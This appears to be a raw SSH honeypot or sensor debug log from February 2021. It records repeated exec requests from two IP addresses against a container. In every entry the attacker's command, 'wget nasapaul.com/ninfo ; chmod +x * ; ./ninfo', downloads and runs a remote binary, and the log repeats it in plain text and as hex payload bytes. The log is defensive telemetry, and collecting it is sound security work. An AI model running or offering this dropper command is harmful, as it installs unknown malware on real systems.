19:39:22.438 services ▶ DEBU 783e Request: &{session %!s(uint32=0) %!s(uint32=0) %!s(uint32=32768) %!s(uint32=32768) %!s(*ssh.mux=&{0xc0000dedc0 {{0 0} [0xc000dbcd80] 0} 0xc000e95c80 {0 0} 0xc000e95ce0 0xc000e95d40 0xc000032ec0 <nil>}) %!s(bool=true) %!s(ssh.channelDirection=0) %!s(chan interface {}=0xc000e95e00) {%!s(int32=0) %!s(uint32=0)} %!s(chan *ssh.Request=0xc000e95da0) %!s(bool=false) {%!s(*sync.Cond=&{{} 0xc0011494c8 {0 0 0 <nil> <nil>} 824633929584}) %!s(uint32=262144) %!s(int=0) %!s(bool=false)} %!s(*ssh.buffer=&{0xc000032f80 0xc0065a0060 0xc0065a0060 false}) %!s(*ssh.buffer=&{0xc000032fc0 0xc0065a00a0 0xc0065a00a0 false}) {%!s(int32=0) %!s(uint32=0)} %!s(uint32=2097152) {%!s(int32=0) %!s(uint32=0)} %!s(bool=false) map[]} exec %!s(bool=true) .wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo | |
services > ssh > category=ssh, date=2021-02-16 19:39:22.438929832 +0000 UTC m=+1544150.720325611, destination-ip=172.17.0.2, destination-port=8022, sensor=services, source-ip=188.166.124.29, source-port=47254, ssh.exec=[]string{"wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo"}, ssh.payload=[]byte{0x0, 0x0, 0x0, 0x2e, 0x77, 0x67, 0x65, 0x74, 0x20, 0x6e, 0x61, 0x73, 0x61, 0x70, 0x61, 0x75, 0x6c, 0x2e, 0x63, 0x6f, 0x6d, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f, 0x20, 0x3b, 0x20, 0x63, 0x68, 0x6d, 0x6f, 0x64, 0x20, 0x2b, 0x78, 0x20, 0x2a, 0x20, 0x3b, 0x20, 0x2e, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f}, ssh.request-type=exec, ssh.sessionid=c0m1uq8k9kn000dnb0pg, token=c0a8v4ok9kn000dn77n0, type=ssh-request | |
06:41:22.360 services ▶ DEBU 7ced Request: &{session %!s(uint32=0) %!s(uint32=0) %!s(uint32=32768) %!s(uint32=32768) %!s(*ssh.mux=&{0xc0000de000 {{0 0} [0xc000e40000] 0} 0xc0065784e0 {0 0} 0xc006578540 0xc0065785a0 0xc000032300 <nil>}) %!s(bool=true) %!s(ssh.channelDirection=0) %!s(chan interface {}=0xc0011d65a0) {%!s(int32=0) %!s(uint32=0)} %!s(chan *ssh.Request=0xc0011d6540) %!s(bool=false) {%!s(*sync.Cond=&{{} 0xc006628570 {0 0 0 <nil> <nil>} 824649040112}) %!s(uint32=262144) %!s(int=0) %!s(bool=false)} %!s(*ssh.buffer=&{0xc000e9c140 0xc0011fe060 0xc0011fe060 false}) %!s(*ssh.buffer=&{0xc000e9c180 0xc0011fe0a0 0xc0011fe0a0 false}) {%!s(int32=0) %!s(uint32=0)} %!s(uint32=2097152) {%!s(int32=0) %!s(uint32=0)} %!s(bool=false) map[]} exec %!s(bool=true) .wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo | |
services > ssh > category=ssh, date=2021-02-17 06:41:22.362375011 +0000 UTC m=+1583870.643770813, destination-ip=172.17.0.2, destination-port=8022, sensor=services, source-ip=188.166.124.29, source-port=43054, ssh.exec=[]string{"wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo"}, ssh.payload=[]byte{0x0, 0x0, 0x0, 0x2e, 0x77, 0x67, 0x65, 0x74, 0x20, 0x6e, 0x61, 0x73, 0x61, 0x70, 0x61, 0x75, 0x6c, 0x2e, 0x63, 0x6f, 0x6d, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f, 0x20, 0x3b, 0x20, 0x63, 0x68, 0x6d, 0x6f, 0x64, 0x20, 0x2b, 0x78, 0x20, 0x2a, 0x20, 0x3b, 0x20, 0x2e, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f}, ssh.request-type=exec, ssh.sessionid=c0mbl48k9kn000dnb5gg, token=c0a8v4ok9kn000dn77n0, type=ssh-request | |
06:45:17.966 services ▶ DEBU 7d4e Request: &{session %!s(uint32=0) %!s(uint32=0) %!s(uint32=32768) %!s(uint32=32768) %!s(*ssh.mux=&{0xc0000de000 {{0 0} [0xc0000ba240] 0} 0xc006578240 {0 0} 0xc0065782a0 0xc006578360 0xc000032140 <nil>}) %!s(bool=true) %!s(ssh.channelDirection=0) %!s(chan interface {}=0xc006578480) {%!s(int32=0) %!s(uint32=0)} %!s(chan *ssh.Request=0xc006578420) %!s(bool=false) {%!s(*sync.Cond=&{{} 0xc000e90770 {0 0 0 <nil> <nil>} 824633926256}) %!s(uint32=262144) %!s(int=0) %!s(bool=false)} %!s(*ssh.buffer=&{0xc000032300 0xc001151640 0xc001151640 false}) %!s(*ssh.buffer=&{0xc000032580 0xc001151700 0xc001151700 false}) {%!s(int32=0) %!s(uint32=0)} %!s(uint32=2097152) {%!s(int32=0) %!s(uint32=0)} %!s(bool=false) map[]} exec %!s(bool=true) .wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo | |
services > ssh > category=ssh, date=2021-02-17 06:45:17.966566009 +0000 UTC m=+1584106.247961833, destination-ip=172.17.0.2, destination-port=8022, sensor=services, source-ip=188.166.124.29, source-port=45688, ssh.exec=[]string{"wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo"}, ssh.payload=[]byte{0x0, 0x0, 0x0, 0x2e, 0x77, 0x67, 0x65, 0x74, 0x20, 0x6e, 0x61, 0x73, 0x61, 0x70, 0x61, 0x75, 0x6c, 0x2e, 0x63, 0x6f, 0x6d, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f, 0x20, 0x3b, 0x20, 0x63, 0x68, 0x6d, 0x6f, 0x64, 0x20, 0x2b, 0x78, 0x20, 0x2a, 0x20, 0x3b, 0x20, 0x2e, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f}, ssh.request-type=exec, ssh.sessionid=c0mbmv8k9kn000dnb5sg, token=c0a8v4ok9kn000dn77n0, type=ssh-request | |
16:00:26.520 services ▶ DEBU a883 Request: &{session %!s(uint32=0) %!s(uint32=0) %!s(uint32=32768) %!s(uint32=32768) %!s(*ssh.mux=&{0xc0000de000 {{0 0} [0xc000dee000] 0} 0xc0011d61e0 {0 0} 0xc0011d6240 0xc0011d6360 0xc000032140 <nil>}) %!s(bool=true) %!s(ssh.channelDirection=0) %!s(chan interface {}=0xc000efa720) {%!s(int32=0) %!s(uint32=0)} %!s(chan *ssh.Request=0xc000efa6c0) %!s(bool=false) {%!s(*sync.Cond=&{{} 0xc0004827d0 {0 0 0 <nil> <nil>} 824649040496}) %!s(uint32=262144) %!s(int=0) %!s(bool=false)} %!s(*ssh.buffer=&{0xc000e9c280 0xc0011fe240 0xc0011fe240 false}) %!s(*ssh.buffer=&{0xc000e9c2c0 0xc0011fe280 0xc0011fe280 false}) {%!s(int32=0) %!s(uint32=0)} %!s(uint32=2097152) {%!s(int32=0) %!s(uint32=0)} %!s(bool=false) map[]} exec %!s(bool=true) .wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo | |
services > ssh > category=ssh, date=2021-02-25 16:00:26.521731488 +0000 UTC m=+2308614.803127297, destination-ip=172.17.0.2, destination-port=8022, sensor=services, source-ip=136.244.96.12, source-port=41574, ssh.exec=[]string{"wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo"}, ssh.payload=[]byte{0x0, 0x0, 0x0, 0x2e, 0x77, 0x67, 0x65, 0x74, 0x20, 0x6e, 0x61, 0x73, 0x61, 0x70, 0x61, 0x75, 0x6c, 0x2e, 0x63, 0x6f, 0x6d, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f, 0x20, 0x3b, 0x20, 0x63, 0x68, 0x6d, 0x6f, 0x64, 0x20, 0x2b, 0x78, 0x20, 0x2a, 0x20, 0x3b, 0x20, 0x2e, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f}, ssh.request-type=exec, ssh.sessionid=c0rsj68k9kn000dnchng, token=c0a8v4ok9kn000dn77n0, type=ssh-request | |
16:03:19.025 services ▶ DEBU a8e8 Request: &{session %!s(uint32=0) %!s(uint32=0) %!s(uint32=32768) %!s(uint32=32768) %!s(*ssh.mux=&{0xc0000de9a0 {{0 0} [0xc0000ba540] 0} 0xc000efac00 {0 0} 0xc000efac60 0xc000efad20 0xc000e9ca40 <nil>}) %!s(bool=true) %!s(ssh.channelDirection=0) %!s(chan interface {}=0xc000efade0) {%!s(int32=0) %!s(uint32=0)} %!s(chan *ssh.Request=0xc000efad80) %!s(bool=false) {%!s(*sync.Cond=&{{} 0xc000482f08 {0 0 0 <nil> <nil>} 824649042672}) %!s(uint32=262144) %!s(int=0) %!s(bool=false)} %!s(*ssh.buffer=&{0xc000e9cb00 0xc000e99e00 0xc000e99e00 false}) %!s(*ssh.buffer=&{0xc000e9cb40 0xc000e99e40 0xc000e99e40 false}) {%!s(int32=0) %!s(uint32=0)} %!s(uint32=2097152) {%!s(int32=0) %!s(uint32=0)} %!s(bool=false) map[]} exec %!s(bool=true) .wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo | |
services > ssh > category=ssh, date=2021-02-25 16:03:19.02608191 +0000 UTC m=+2308787.307477687, destination-ip=172.17.0.2, destination-port=8022, sensor=services, source-ip=136.244.96.12, source-port=37354, ssh.exec=[]string{"wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo"}, ssh.payload=[]byte{0x0, 0x0, 0x0, 0x2e, 0x77, 0x67, 0x65, 0x74, 0x20, 0x6e, 0x61, 0x73, 0x61, 0x70, 0x61, 0x75, 0x6c, 0x2e, 0x63, 0x6f, 0x6d, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f, 0x20, 0x3b, 0x20, 0x63, 0x68, 0x6d, 0x6f, 0x64, 0x20, 0x2b, 0x78, 0x20, 0x2a, 0x20, 0x3b, 0x20, 0x2e, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f}, ssh.request-type=exec, ssh.sessionid=c0rskhgk9kn000dnci40, token=c0a8v4ok9kn000dn77n0, type=ssh-request |